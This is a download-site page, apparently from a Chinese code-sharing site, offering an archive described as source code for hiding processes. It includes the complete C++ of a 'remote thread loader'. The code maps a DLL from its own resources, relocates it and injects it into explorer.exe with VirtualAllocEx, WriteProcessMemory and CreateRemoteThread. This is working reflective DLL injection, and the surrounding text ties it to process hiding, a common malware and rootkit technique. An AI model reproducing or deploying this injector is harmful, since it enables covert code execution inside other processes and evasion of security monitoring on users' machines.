#include "stdafx.h"
#include "..\ThreadParam.h"
// 全局变量:
static TCHAR _szTitle[] = _T("远程线程装载器"); // 标题栏文本
static PIMAGE_NT_HEADERS _pinh;
#define IMAGE_SIZE (_pinh->OptionalHeader.SizeOfImage)
#define RVA_EXPORT_TABEL (_pinh->OptionalHeader.DataDirectory[0].VirtualAddress)
#define RVA_RELOC_TABEL (_pinh->OptionalHeader.DataDirectory[5].VirtualAddress)
#define PROCESS_OPEN_MODE (PROCESS_CREATE_THREAD|PROCESS_VM_WRITE|PROCESS_VM_OPERATION)
//get the process id of the target process
//here, we aimed at "explorer.exe"
static DWORD GetTargetProcessId()
{
DWORD dwProcessId = 0;
HWND hWnd = FindWindow(_T("Progman"), _T("Program Manager"));
if(hWnd != NULL)
GetWindowThreadProcessId(hWnd, &dwProcessId);
return dwProcessId;
}
//map the dll's code and data in resource to memory
static LPBYTE MapRsrcToImage()
{
HRSRC hRsrc = FindResource(NULL, _T("rtdll"), _T("RT_DLL"));
if(hRsrc == NULL)
return NULL;
HGLOBAL hGlobal = LoadResource(NULL, hRsrc);
if(hGlobal == NULL)
return NULL;
LPBYTE pRsrc = (LPBYTE)LockResource(hGlobal);
if(pRsrc == NULL)
return NULL;
_pinh = (PIMAGE_NT_HEADERS)(pRsrc + ((PIMAGE_DOS_HEADER)pRsrc)->e_lfanew);
LPBYTE pImage = (LPBYTE)VirtualAlloc(NULL, IMAGE_SIZE, MEM_COMMIT, PAGE_READWRITE);
if(pImage != NULL)
{
DWORD dwSections = _pinh->FileHeader.NumberOfSections;
DWORD dwBytes2Copy = (((LPBYTE)_pinh) - pRsrc) + sizeof(IMAGE_NT_HEADERS);
PIMAGE_SECTION_HEADER pish = (PIMAGE_SECTION_HEADER)(pRsrc + dwBytes2Copy);
dwBytes2Copy += dwSections * sizeof(IMAGE_SECTION_HEADER);
memcpy(pImage, pRsrc, dwBytes2Copy);
for(DWORD i=0; i<dwSections; i++, pish++)
{
LPBYTE pSrc = pRsrc + pish->PointerToRawData;
LPBYTE pDest = pImage + pish->VirtualAddress;
dwBytes2Copy = pish->SizeOfRawData;
memcpy(pDest, pSrc, dwBytes2Copy);
}
_pinh = (PIMAGE_NT_HEADERS)(pImage + ((PIMAGE_DOS_HEADER)pImage)->e_lfanew);
}
return pImage;
}
//get the rva of the entry of the exported function "ThreadEntry"
static DWORD GetEntryPoint(LPBYTE pImage)
{
DWORD dwEntry = 0, index = 0;
IMAGE_EXPORT_DIRECTORY* pied = (IMAGE_EXPORT_DIRECTORY*)(pImage + RVA_EXPORT_TABEL);
DWORD* pNameTbl = (DWORD*)(pImage + pied->AddressOfNames);
for(index=0; index<pied->NumberOfNames; index++, pNameTbl++)
{
if(strcmp("ThreadEntry", (char*)(pImage + (*pNameTbl))) == 0)
{
index = ((WORD*)(pImage + pied->AddressOfNameOrdinals))[index];
dwEntry = ((DWORD*)(pImage + pied->AddressOfFunctions))[index];
break;
}
}
return dwEntry;
}
//relocate the image
static void RelocImage(PBYTE pImage, PBYTE pRelocTbl, DWORD dwRelocOffset)
{
DWORD dwRva = 0, dwRvaCount = 0;
WORD* arrOffset = NULL;
PIMAGE_BASE_RELOCATION pibr = (PIMAGE_BASE_RELOCATION)pRelocTbl;
while(pibr->VirtualAddress != NULL)
{
arrOffset = (WORD*)(pRelocTbl + sizeof(IMAGE_BASE_RELOCATION));
dwRvaCount = (pibr->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / 2;
for(DWORD i=0; i<dwRvaCount; i++)
{
dwRva = arrOffset[i];
if((dwRva & 0xf000) != 0x3000)
continue;
dwRva &= 0x0fff;
dwRva += pibr->VirtualAddress + (DWORD)pImage;
*(DWORD*)dwRva += dwRelocOffset;
}
pRelocTbl += pibr->SizeOfBlock;
pibr = (PIMAGE_BASE_RELOCATION)pRelocTbl;
}
}
static void PrepareData(LPBYTE pImage, LPBYTE pInjectPos, PVOID* ppEntry, PVOID* ppParam)
{
LPBYTE pRelocTbl = pImage + RVA_RELOC_TABEL;
DWORD dwRelocOffset = (DWORD)pInjectPos - _pinh->OptionalHeader.ImageBase;
RelocImage(pImage, pRelocTbl, dwRelocOffset);
PTHREADPARAM param = (PTHREADPARAM)pRelocTbl;
HMODULE hKernel32 = GetModuleHandle(_T("kernel32.dll"));
param->fnGetProcAddr = (FxGetProcAddr)GetProcAddress(hKernel32, "GetProcAddress");
param->fnLoadLibrary = (FxLoadLibrary)GetProcAddress(hKernel32, "LoadLibraryA");
param->pImageBase = pInjectPos;
*ppEntry = pInjectPos + GetEntryPoint(pImage);
*ppParam = pInjectPos + RVA_RELOC_TABEL;
}
int APIENTRY _tWinMain(HINSTANCE hInst, HINSTANCE, LPTSTR lpCmdLine, int nCmdShow)
{
LPBYTE pImage = NULL, pInjectPos = NULL;
HANDLE hProcess = NULL, hThread = NULL;
DWORD dwProcessId = 0;
LPTHREAD_START_ROUTINE pEntry = NULL;
PTHREADPARAM pParam = NULL;
BOOL bOk = FALSE;
__try
{
if((pImage = (LPBYTE)MapRsrcToImage()) == NULL)
__leave;
if((dwProcessId = GetTargetProcessId()) == 0)
__leave;
if((hProcess = OpenProcess(PROCESS_OPEN_MODE, FALSE, dwProcessId)) == NULL)
__leave;
if((pInjectPos = (LPBYTE)VirtualAllocEx(hProcess, NULL, IMAGE_SIZE,
MEM_COMMIT, PAGE_EXECUTE_READWRITE)) == NULL)
__leave;
PrepareData(pImage, pInjectPos, (PVOID*)&pEntry, (PVOID*)&pParam);
if(!WriteProcessMemory(hProcess, pInjectPos, pImage, IMAGE_SIZE, NULL))
__leave;
hThread = CreateRemoteThread(hProcess, NULL, 0, pEntry, pParam, 0, NULL);
if(hThread == NULL)
__leave;
bOk = TRUE;
}
__finally
{
if(!bOk && pInjectPos != NULL)
VirtualFreeEx(hProcess, pInjectPos, 0, MEM_RELEASE);
if(hThread != NULL)
CloseHandle(hThread);
if(hProcess != NULL)
CloseHandle(hProcess);
if(pImage != NULL)
VirtualFree(pImage, 0, MEM_RELEASE);
}
if(bOk)
MessageBox(NULL, _T("线程插入成功!"), _szTitle, MB_OK | MB_ICONINFORMATION);
else
MessageBox(NULL, _T("线程插入失败!"), _szTitle, MB_OK | MB_ICONINFORMATION);
return 0;
}
没有合适的资源?快使用搜索试试~ 我知道了~
dll&c++隐藏进程的源码
共17个文件
cpp:6个
h:4个
vcproj:2个
需积分: 50 45 下载量 68 浏览量
2013-08-08
10:01:31
上传
评论
收藏 31KB RAR 举报
温馨提示
我下载的东西,但是名字说得不是很对。我是初学C的,对C++也不太懂,改了名字,希望对大家有帮助。
资源推荐
资源详情
资源评论
收起资源包目录
dll&c++隐藏进程的源码.rar (17个子文件)
hidesrc
Inject.sln 1KB
Loader
ll.cpp 5KB
Loader.vcproj 4KB
stdafx.h 258B
Loader.cpp 5KB
stdafx.cpp 206B
Loader.rc 2KB
Dll.dll 52KB
ThreadParam.h 304B
Dll
resource.h 446B
stdafx.h 241B
Dll.rc 2KB
Dll.cpp 2KB
Main.cpp 378B
stdafx.cpp 203B
Dll.def 43B
Dll.vcproj 4KB
共 17 条
- 1
资源评论
神天狼01
- 粉丝: 0
- 资源: 1
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功